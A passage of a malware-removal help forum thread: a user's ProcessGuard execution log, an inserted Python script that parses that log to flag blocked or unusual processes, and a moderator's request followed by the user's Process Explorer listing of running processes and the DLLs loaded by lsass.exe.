Sat 03 - 16:23:29 [EXECUTION] "c:\program files\processguard\pgaccount.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1184]
[EXECUTION] Commandline - [ "c:\program files\processguard\pgaccount.exe" ]
Sat 03 - 16:23:30 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1184]
[EXECUTION] Commandline - [ "c:\windows\system32\rundll32.exe" nview.dll,nviewloadhook ]
Sat 03 - 16:23:32 [EXECUTION] "c:\program files\processguard\procguard.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1184]
[EXECUTION] Commandline - [ "c:\program files\processguard\procguard.exe" -minimize ]
Sat 03 - 16:23:32 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [212]
[EXECUTION] Commandline - [ rundll32 nview.dll,nviewinitialize ]
Sat 03 - 16:23:33 [EXECUTION] "c:\windows\system32\imapi.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\services.exe" [476]
[EXECUTION] Commandline - [ c:\windows\system32\imapi.exe ]
Sat 03 - 16:23:34 [EXECUTION] "c:\program files\microsoft office\office\osa9.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1184]
[EXECUTION] Commandline - [ "c:\program files\microsoft office\office\osa9.exe" -b -l ]
Sat 03 - 16:24:08 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susds4803a6f4f77ae748bac303f317d5d6fa ]
Sat 03 - 16:24:08 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susds030de7edb5ad754b84433a09651951f0 ]
Sat 03 - 16:24:08 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susdsd36dbec67b26734d99337236aef0c6c2 ]
Sat 03 - 16:24:08 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susds45c55d77c86c164b89f784aafe3bd900 ]
Sat 03 - 16:24:08 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ rundll32.exe shell32.dll,activate_rundll ]
Sat 03 - 16:24:09 [EXECUTION] "c:\windows\system32\imapi.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\services.exe" [476]
[EXECUTION] Commandline - [ c:\windows\system32\imapi.exe ]
Sat 03 - 16:24:37 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ rundll32.exe shell32.dll,activate_rundll ]
Sat 03 - 16:24:37 [EXECUTION] "c:\windows\system32\imapi.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\services.exe" [476]
[EXECUTION] Commandline - [ c:\windows\system32\imapi.exe ]
Sat 03 - 16:25:53 [EXECUTION] "c:\windows\explorer.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1184]
[EXECUTION] Commandline - [ "c:\windows\explorer.exe" /n,/e,c:\ ]
Sat 03 - 16:25:55 [EXECUTION] "c:\windows\explorer.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1184]
[EXECUTION] Commandline - [ "c:\windows\explorer.exe" /n,/e,c:\ ]
Sat 03 - 16:26:50 [EXECUTION] "g:\autorun.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1184]
[EXECUTION] Commandline - [ g:\autorun.exe "index.html$0$0" /hide ]
Sat 03 - 16:26:50 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ rundll32.exe shell32.dll,activate_rundll ]
Sat 03 - 16:27:05 [EXECUTION] "c:\windows\system32\dumprep.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\dumprep.exe" 1184 -h 824 "global\0400f64a04f41981a8" ]
Sat 03 - 16:27:06 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ rundll32.exe shell32.dll,activate_rundll ]
Sat 03 - 16:27:14 [EXECUTION] "c:\windows\explorer.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\winlogon.exe" [432]
[EXECUTION] Commandline - [ c:\windows\explorer.exe ]
Sat 03 - 16:28:18 [EXECUTION] "c:\windows\system32\logonui.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\winlogon.exe" [432]
[EXECUTION] Commandline - [ logonui.exe /status /shutdown ]
Sat 03 - 16:28:31 [EXECUTION] "c:\windows\system32\dwwin.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [1344]
[EXECUTION] Commandline - [ c:\windows\system32\dwwin.exe -x -s 172 ]
Sat 03 - 16:28:31 [EXECUTION] "c:\windows\system32\imapi.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\services.exe" [476]
[EXECUTION] Commandline - [ c:\windows\system32\imapi.exe ]
Sat 03 - 16:28:38 [TERMINATE] c:\windows\system32\services.exe [476] was blocked from terminating c:\windows\system32\spoolsv.exe [900]

---Process Guard Log Started---
Sat 03 - 16:29:43 [EXECUTION] "c:\windows\system32\tcpsvcs.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\services.exe" [480]
[EXECUTION] Commandline - [ c:\windows\system32\tcpsvcs.exe ]
Sat 03 - 16:29:43 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\nvsvc32.exe" [1320]
[EXECUTION] Commandline - [ rundll32.exe nvcpl.dll,resetview ]
Sat 03 - 16:29:43 [EXECUTION] "c:\windows\system32\svchost.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\services.exe" [480]
[EXECUTION] Commandline - [ c:\windows\system32\svchost.exe -k imgsvc ]
Sat 03 - 16:30:37 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susdsf57ed4be707c0d43be59fe9ade647c3f ]
Sat 03 - 16:30:37 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susds76facb88049ccf4eb227d289e92a28f0 ]
Sat 03 - 16:30:37 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susds64dacab271ccfe48bdcd354fe1dad4f3 ]
Sat 03 - 16:30:37 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susdsaec3a16bad7b2b42bde92899e637c6d7 ]
Sat 03 - 16:30:42 [EXECUTION] "c:\windows\system32\spool\drivers\w32x86\3\hpztsb07.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1008]
[EXECUTION] Commandline - [ "c:\windows\system32\spool\drivers\w32x86\3\hpztsb07.exe" ]
Sat 03 - 16:30:42 [EXECUTION] "c:\program files\roxio\easy cd creator 5\directcd\directcd.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1008]
[EXECUTION] Commandline - [ "c:\program files\roxio\easy cd creator 5\directcd\directcd.exe" ]
Sat 03 - 16:30:43 [EXECUTION] "c:\windows\system32\nerocheck.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1008]
[EXECUTION] Commandline - [ "c:\windows\system32\nerocheck.exe" ]
Sat 03 - 16:30:43 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1008]
[EXECUTION] Commandline - [ "c:\windows\system32\rundll32.exe" c:\windows\system32\nvcpl.dll,nvstartup ]
Sat 03 - 16:30:43 [EXECUTION] "c:\windows\system32\dumprep.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1008]
[EXECUTION] Commandline - [ "c:\windows\system32\dumprep.exe" 0 -k ]
Sat 03 - 16:30:43 [EXECUTION] "c:\program files\quicktime\qttask.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1008]
[EXECUTION] Commandline - [ "c:\program files\quicktime\qttask.exe" -atboottime ]
Sat 03 - 16:30:43 [EXECUTION] "c:\windows\system32\dumprep.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [292]
[EXECUTION] Commandline - [ c:\windows\system32\dumprep.exe 0 -kg ]
Sat 03 - 16:30:43 [EXECUTION] "c:\program files\grisoft\avg free\avgcc.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1008]
[EXECUTION] Commandline - [ "c:\progra~1\grisoft\avgfre~1\avgcc.exe" /startup ]
Sat 03 - 16:30:44 [EXECUTION] "c:\program files\grisoft\avg free\avgemc.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1008]
[EXECUTION] Commandline - [ "c:\progra~1\grisoft\avgfre~1\avgemc.exe" ]
Sat 03 - 16:30:44 [EXECUTION] "c:\documents and settings\dug and tania\my documents\downloads\regprot.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1008]
[EXECUTION] Commandline - [ "c:\documents and settings\dug and tania\my documents\downloads\regprot.exe" /start ]
Sat 03 - 16:30:44 [EXECUTION] "c:\windows\system32\nwiz.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1008]
[EXECUTION] Commandline - [ "c:\windows\system32\nwiz.exe" /install ]
Sat 03 - 16:30:44 [EXECUTION] "c:\program files\processguard\pgaccount.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1008]
[EXECUTION] Commandline - [ "c:\program files\processguard\pgaccount.exe" ]
Sat 03 - 16:30:45 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1008]
[EXECUTION] Commandline - [ "c:\windows\system32\rundll32.exe" nview.dll,nviewloadhook ]
Sat 03 - 16:30:45 [EXECUTION] "c:\program files\processguard\procguard.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1008]
[EXECUTION] Commandline - [ "c:\program files\processguard\procguard.exe" -minimize ]
Sat 03 - 16:30:45 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [392]
[EXECUTION] Commandline - [ rundll32 nview.dll,nviewinitialize ]
Sat 03 - 16:30:46 [EXECUTION] "c:\windows\system32\imapi.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\services.exe" [480]
[EXECUTION] Commandline - [ c:\windows\system32\imapi.exe ]
Sat 03 - 16:30:46 [EXECUTION] "c:\program files\microsoft office\office\osa9.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1008]
[EXECUTION] Commandline - [ "c:\program files\microsoft office\office\osa9.exe" -b -l ]
Sat 03 - 16:31:12 [EXECUTION] "c:\windows\explorer.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1008]
[EXECUTION] Commandline - [ "c:\windows\explorer.exe" /n,/e,c:\ ]
Sat 03 - 16:32:37 [EXECUTION] "c:\windows\system32\logonui.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\winlogon.exe" [432]
[EXECUTION] Commandline - [ logonui.exe /status /shutdown ]
Sat 03 - 16:32:47 [TERMINATE] c:\windows\system32\services.exe [480] was blocked from terminating c:\windows\system32\spoolsv.exe [1040]

---Process Guard Log Started---
Sat 03 - 17:10:14 [EXECUTION] "c:\windows\system32\tcpsvcs.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\services.exe" [476]
[EXECUTION] Commandline - [ c:\windows\system32\tcpsvcs.exe ]
Sat 03 - 17:10:14 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\nvsvc32.exe" [1316]
[EXECUTION] Commandline - [ rundll32.exe nvcpl.dll,resetview ]
Sat 03 - 17:10:15 [EXECUTION] "c:\windows\system32\svchost.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\services.exe" [476]
[EXECUTION] Commandline - [ c:\windows\system32\svchost.exe -k imgsvc ]
Sat 03 - 17:10:16 [EXECUTION] "c:\program files\grisoft\avg free\avginet.exe" was allowed to run
[EXECUTION] Started by "c:\progra~1\grisoft\avgfre~1\avgamsvr.exe" [1180]
[EXECUTION] Commandline - [ "c:\progra~1\grisoft\avgfre~1\avginet.exe" /sched=5 ]
Sat 03 - 17:10:22 [EXECUTION] "c:\windows\system32\spool\drivers\w32x86\3\hpztsb07.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1008]
[EXECUTION] Commandline - [ "c:\windows\system32\spool\drivers\w32x86\3\hpztsb07.exe" ]
Sat 03 - 17:10:22 [EXECUTION] "c:\program files\roxio\easy cd creator 5\directcd\directcd.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1008]
[EXECUTION] Commandline - [ "c:\program files\roxio\easy cd creator 5\directcd\directcd.exe" ]
Sat 03 - 17:10:22 [EXECUTION] "c:\windows\system32\nerocheck.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1008]
[EXECUTION] Commandline - [ "c:\windows\system32\nerocheck.exe" ]
Sat 03 - 17:10:23 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1008]
[EXECUTION] Commandline - [ "c:\windows\system32\rundll32.exe" c:\windows\system32\nvcpl.dll,nvstartup ]
Sat 03 - 17:10:23 [EXECUTION] "c:\windows\system32\dumprep.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1008]
[EXECUTION] Commandline - [ "c:\windows\system32\dumprep.exe" 0 -k ]
Sat 03 - 17:10:23 [EXECUTION] "c:\program files\quicktime\qttask.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1008]
[EXECUTION] Commandline - [ "c:\program files\quicktime\qttask.exe" -atboottime ]
Sat 03 - 17:10:23 [EXECUTION] "c:\windows\system32\dumprep.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [2020]
[EXECUTION] Commandline - [ c:\windows\system32\dumprep.exe 0 -kg ]
Sat 03 - 17:10:23 [EXECUTION] "c:\program files\grisoft\avg free\avgcc.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1008]
[EXECUTION] Commandline - [ "c:\progra~1\grisoft\avgfre~1\avgcc.exe" /startup ]
Sat 03 - 17:10:24 [EXECUTION] "c:\program files\grisoft\avg free\avgemc.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1008]
[EXECUTION] Commandline - [ "c:\progra~1\grisoft\avgfre~1\avgemc.exe" ]
Sat 03 - 17:10:24 [EXECUTION] "c:\documents and settings\dug and tania\my documents\downloads\regprot.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1008]
[EXECUTION] Commandline - [ "c:\documents and settings\dug and tania\my documents\downloads\regprot.exe" /start ]
Sat 03 - 17:10:24 [EXECUTION] "c:\windows\system32\nwiz.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1008]
[EXECUTION] Commandline - [ "c:\windows\system32\nwiz.exe" /install ]
Sat 03 - 17:10:24 [EXECUTION] "c:\program files\processguard\pgaccount.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1008]
[EXECUTION] Commandline - [ "c:\program files\processguard\pgaccount.exe" ]
Sat 03 - 17:10:24 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1008]
[EXECUTION] Commandline - [ "c:\windows\system32\rundll32.exe" nview.dll,nviewloadhook ]
Sat 03 - 17:10:24 [EXECUTION] "c:\program files\processguard\procguard.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1008]
[EXECUTION] Commandline - [ "c:\program files\processguard\procguard.exe" -minimize ]
Sat 03 - 17:10:25 [EXECUTION] "c:\program files\microsoft office\office\osa9.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1008]
[EXECUTION] Commandline - [ "c:\program files\microsoft office\office\osa9.exe" -b -l ]
Sat 03 - 17:10:25 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [304]
[EXECUTION] Commandline - [ rundll32 nview.dll,nviewinitialize ]
Sat 03 - 17:10:25 [EXECUTION] "c:\windows\system32\imapi.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\services.exe" [476]
[EXECUTION] Commandline - [ c:\windows\system32\imapi.exe ]
Sat 03 - 17:10:35 [EXECUTION] "c:\windows\explorer.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1008]
[EXECUTION] Commandline - [ "c:\windows\explorer.exe" /n,/e,c:\ ]
Sat 03 - 17:11:04 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susdsbc1320c460a9c74bba7fe1007ae2fe91 ]
Sat 03 - 17:11:04 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUT
  • 0
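The ProcessGuard log above is read by hand in this thread. As an added example (not from the thread, and not ProcessGuard's own tooling), here is a small Python parser for that log format that pulls out what the helper is looking for: what was blocked, what ran with an unrecognised parent ("Unknown Process"), what ran from outside the Windows and Program Files trees, and which terminate attempts were stopped. The embedded sample is an excerpt of the log posted above; the trusted-path list and the "allowed to terminate" wording for TERMINATE lines are assumptions.

```python
import re
from collections import Counter
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Excerpt of the ProcessGuard log posted in the thread (lines copied as posted).
SAMPLE_LOG = r"""---Process Guard Log Started---
Sat 03 - 16:24:08 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susds4803a6f4f77ae748bac303f317d5d6fa ]
Sat 03 - 16:26:50 [EXECUTION] "g:\autorun.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1184]
[EXECUTION] Commandline - [ g:\autorun.exe "index.html$0$0" /hide ]
Sat 03 - 16:28:31 [EXECUTION] "c:\windows\system32\dwwin.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [1344]
[EXECUTION] Commandline - [ c:\windows\system32\dwwin.exe -x -s 172 ]
Sat 03 - 16:28:38 [TERMINATE] c:\windows\system32\services.exe [476] was blocked from terminating c:\windows\system32\spoolsv.exe [900]
Sat 03 - 16:30:44 [EXECUTION] "c:\documents and settings\dug and tania\my documents\downloads\regprot.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1008]
[EXECUTION] Commandline - [ "c:\documents and settings\dug and tania\my documents\downloads\regprot.exe" /start ]
"""

# Each EXECUTION event is three lines: a timestamped header, a "Started by" line
# and a "Commandline" line. TERMINATE events are a single timestamped line.
TIME = r"(?P<time>\w{3} \d{2} - \d{2}:\d{2}:\d{2}) "
RE_EXEC = re.compile(TIME + r'\[EXECUTION\] "(?P<image>[^"]+)" was '
                     r"(?P<verdict>allowed|blocked) (?:to run|from running)$")
RE_PARENT = re.compile(r'\[EXECUTION\] Started by "(?P<parent>[^"]+)" \[(?P<ppid>\d+)\]$')
RE_CMD = re.compile(r"\[EXECUTION\] Commandline - \[ (?P<cmd>.*) \]$")
# Only the "blocked from terminating" form appears in the thread; the
# "allowed to terminate" wording is an assumption.
RE_TERM = re.compile(TIME + r"\[TERMINATE\] (?P<image>.+?) \[(?P<pid>\d+)\] was "
                     r"(?P<verdict>allowed|blocked) (?:to terminate|from terminating) "
                     r"(?P<target>.+?) \[(?P<tpid>\d+)\]$")

# Assumption: where startup items on this machine are expected to live.
TRUSTED_PREFIXES = ("c:\\windows\\", "c:\\program files\\")


@dataclass
class Event:
    time: str
    kind: str                 # "EXECUTION" or "TERMINATE"
    image: str                # executed image, or the process attempting the terminate
    verdict: str              # "allowed" or "blocked"
    pid: Optional[int] = None         # TERMINATE lines only
    parent: Optional[str] = None      # EXECUTION lines only
    parent_pid: Optional[int] = None
    cmdline: Optional[str] = None
    target: Optional[str] = None      # TERMINATE lines only
    target_pid: Optional[int] = None


def parse_pg_log(text: str) -> List[Event]:
    """Turn the multi-line ProcessGuard log into one Event per execution/terminate."""
    events: List[Event] = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("---Process Guard Log Started---"):
            continue  # blank line or start of a new logging session
        m = RE_EXEC.match(line)
        if m:
            events.append(Event(m["time"], "EXECUTION", m["image"], m["verdict"]))
            continue
        m = RE_TERM.match(line)
        if m:
            events.append(Event(m["time"], "TERMINATE", m["image"], m["verdict"],
                                pid=int(m["pid"]), target=m["target"],
                                target_pid=int(m["tpid"])))
            continue
        m = RE_PARENT.match(line)
        if m and events:  # continuation of the preceding EXECUTION header
            events[-1].parent = m["parent"]
            events[-1].parent_pid = int(m["ppid"])
            continue
        m = RE_CMD.match(line)
        if m and events:
            events[-1].cmdline = m["cmd"]
    return events


def blocked_executions(events: List[Event]) -> Counter:
    """How often each image was stopped from running."""
    return Counter(e.image for e in events if e.kind == "EXECUTION" and e.verdict == "blocked")


def unknown_parent(events: List[Event]) -> List[str]:
    """Images whose parent had already exited or could not be identified."""
    return [e.image for e in events if e.kind == "EXECUTION" and e.parent == "Unknown Process"]


def outside_trusted_paths(events: List[Event], trusted=TRUSTED_PREFIXES) -> List[str]:
    """Images launched from removable media, profile folders, etc."""
    return [e.image for e in events
            if e.kind == "EXECUTION" and not e.image.lower().startswith(trusted)]


def blocked_terminations(events: List[Event]) -> List[Tuple[str, int, str, int]]:
    """(attacker image, pid, target image, target pid) for stopped kill attempts."""
    return [(e.image, e.pid, e.target, e.target_pid)
            for e in events if e.kind == "TERMINATE" and e.verdict == "blocked"]


if __name__ == "__main__":
    evts = parse_pg_log(SAMPLE_LOG)
    print("blocked:", dict(blocked_executions(evts)))
    print("unknown parent:", unknown_parent(evts))
    print("outside trusted paths:", outside_trusted_paths(evts))
    print("blocked terminations:", blocked_terminations(evts))
```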

#202
Metallica

Metallica

    Spyware Veteran

  • GeekU Moderator
  • 31,942 posts
I'm not sure if I already asked you to download and install Process Explorer.
If not, you can get it here:
http://www.sysintern...ssExplorer.html

In the upper pane select View > Show Processes from all users
and > Show Lower Pane
Then select the process lsass.exe

In the lower pane you should see a list of (mostly) dll files.

Then click File > Save as lsassexe.txt

Find that file and post the content.

Regards,
  • 0

#203
duglartis

duglartis

    Member

  • Topic Starter
  • Member
  • PipPipPip
  • 159 posts
Have loaded the programme up and have the following txt file for you to look at. Been having problems with the CPU going up to 100% usage and locking the machine up when on the internet. Also, last night it would appear to be connected but was not in fact connected at all; icons were showing in the tool bar.
Hope this makes sense. Thanks for your help.
Process PID CPU Description Company Name
System Idle Process 0 93.20
Interrupts n/a 0.97 Hardware Interrupts
DPCs n/a Deferred Procedure Calls
System 4
SMSS.EXE 360 Windows NT Session Manager Microsoft Corporation
CSRSS.EXE 408 Client Server Runtime Process Microsoft Corporation
WINLOGON.EXE 440 Windows NT Logon Application Microsoft Corporation
SERVICES.EXE 484 0.97 Services and Controller app Microsoft Corporation
SVCHOST.EXE 652 Generic Host Process for Win32 Services Microsoft Corporation
SVCHOST.EXE 740 Generic Host Process for Win32 Services Microsoft Corporation
SVCHOST.EXE 796 Generic Host Process for Win32 Services Microsoft Corporation
SPOOLSV.EXE 1072 Spooler SubSystem App Microsoft Corporation
ALG.EXE 1204 Application Layer Gateway Service Microsoft Corporation
AVGAMSVR.EXE 1236 AVG Alert Manager GRISOFT, s.r.o.
AVGUPSVC.EXE 1336 AVG Update Service GRISOFT, s.r.o.
DCSUserProt.exe 1412 DiamondCS ProcessGuard Service DiamondCS
ewidoctrl.exe 1488 ewido control ewido networks
NVSVC32.EXE 1580 NVIDIA Driver Helper Service, Version 42.30 NVIDIA Corporation
TCPSVCS.EXE 1688 TCP/IP Services Application Microsoft Corporation
SVCHOST.EXE 1780 Generic Host Process for Win32 Services Microsoft Corporation
SVCHOST.EXE 704 2.91 Generic Host Process for Win32 Services Microsoft Corporation
LSASS.EXE 496 LSA Shell (Export Version) Microsoft Corporation
EXPLORER.EXE 1004 Windows Explorer Microsoft Corporation
HPZTSB07.EXE 1216 HP
Directcd.exe 1244 DirectCD Application Roxio
AVGCC.EXE 1396 AVG Control Center GRISOFT, s.r.o.
AVGEMC.EXE 1420 AVG E-Mail Scanner GRISOFT, s.r.o.
REGPROT.EXE 1480
pgaccount.exe 1588 pgaccount DiamondCS
realsched.exe 1604 RealNetworks Scheduler RealNetworks, Inc.
procguard.exe 1808 GUI Aspect of ProcessGuard DiamondCS
IEXPLORE.EXE 768 Internet Explorer Microsoft Corporation
RUNDLL32.EXE 1856 Run a DLL as an App Microsoft Corporation
procexp.exe 1312 2.91 Sysinternals Process Explorer Sysinternals

Process: LSASS.EXE Pid: 496

Name Description Company Name Version
advapi32.dll Advanced Windows 32 Base API Microsoft Corporation 5.01.2600.1106
comctl32.dll User Experience Controls Library Microsoft Corporation 6.00.2800.1106
comctl32.dll Common Controls Library Microsoft Corporation 5.82.2800.1106
crypt32.dll Crypto API32 Microsoft Corporation 5.131.2600.1106
cryptdll.dll Cryptography Manager Microsoft Corporation 5.01.2600.0000
ctype.nls
dnsapi.dll DNS Client API DLL Microsoft Corporation 5.01.2600.1106
dssenh.dll Microsoft Enhanced DSS and Diffie-Hellman Cryptographic Provider Microsoft Corporation 5.01.2600.1029
gdi32.dll GDI Client DLL Microsoft Corporation 5.01.2600.1106
iphlpapi.dll IP Helper API Microsoft Corporation 5.01.2600.0002
ipsecsvc.dll Windows IPSec SPD Server DLL Microsoft Corporation 5.01.2600.1106
kerberos.dll Kerberos Security Package Microsoft Corporation 5.01.2600.1106
kernel32.dll Windows NT BASE API Client DLL Microsoft Corporation 5.01.2600.1106
locale.nls
lsasrv.dll LSA Server DLL Microsoft Corporation 5.01.2600.1106
lsass.exe LSA Shell (Export Version) Microsoft Corporation 5.01.2600.1106
mpr.dll Multiple Provider Router DLL Microsoft Corporation 5.01.2600.0000
msasn1.dll ASN.1 Runtime APIs Microsoft Corporation 5.01.2600.0000
msprivs.dll Microsoft Privilege Translations Microsoft Corporation 5.01.2600.0000
msv1_0.dll Microsoft Authentication Package v1.0 Microsoft Corporation 5.01.2600.1106
msvcp60.dll Microsoft ® C++ Runtime Library Microsoft Corporation 6.00.8972.0000
msvcrt.dll Windows NT CRT DLL Microsoft Corporation 7.00.2600.1106
mswsock.dll Microsoft Windows Sockets 2.0 Service Provider Microsoft Corporation 5.01.2600.0000
netapi32.dll Net Win32 API DLL Microsoft Corporation 5.01.2600.1106
netlogon.dll Net Logon Services DLL Microsoft Corporation 5.01.2600.1106
ntdll.dll NT Layer DLL Microsoft Corporation 5.01.2600.1106
ntdsapi.dll NT5DS Microsoft Corporation 5.01.2600.0000
oakley.dll Oakley Key Manager Microsoft Corporation 5.01.2600.1106
ole32.dll Microsoft OLE for Windows Microsoft Corporation 5.01.2600.1106
oleaut32.dll Microsoft OLE 3.50 for Windows NT™ and Windows 95™ Operating Systems Microsoft Corporation 3.50.5016.0000
psbase.dll Protected Storage default provider Microsoft Corporation 5.01.2600.1106
pstorsvc.dll Protected storage server Microsoft Corporation 5.01.2600.0000
rpcrt4.dll Remote Procedure Call Runtime Microsoft Corporation 5.01.2600.1106
rsaenh.dll Microsoft Base Cryptographic Provider Microsoft Corporation 5.01.2600.1029
samlib.dll SAM Library DLL Microsoft Corporation 5.01.2600.1106
samsrv.dll SAM Server DLL Microsoft Corporation 5.01.2600.0000
scecli.dll Windows Security Configuration Editor Client Engine Microsoft Corporation 5.01.2600.1106
schannel.dll TLS / SSL Security Provider Microsoft Corporation 5.01.2600.0000
secur32.dll Security Support Provider Interface Microsoft Corporation 5.01.2600.1106
setupapi.dll Windows Setup API Microsoft Corporation 5.01.2600.1106
shell32.dll Windows Shell Common Dll Microsoft Corporation 6.00.2800.1106
shlwapi.dll Shell Light-weight Utility Library Microsoft Corporation 6.00.2800.1106
sortkey.nls
sorttbls.nls
unicode.nls
user32.dll Windows XP USER API Client DLL Microsoft Corporation 5.01.2600.1106
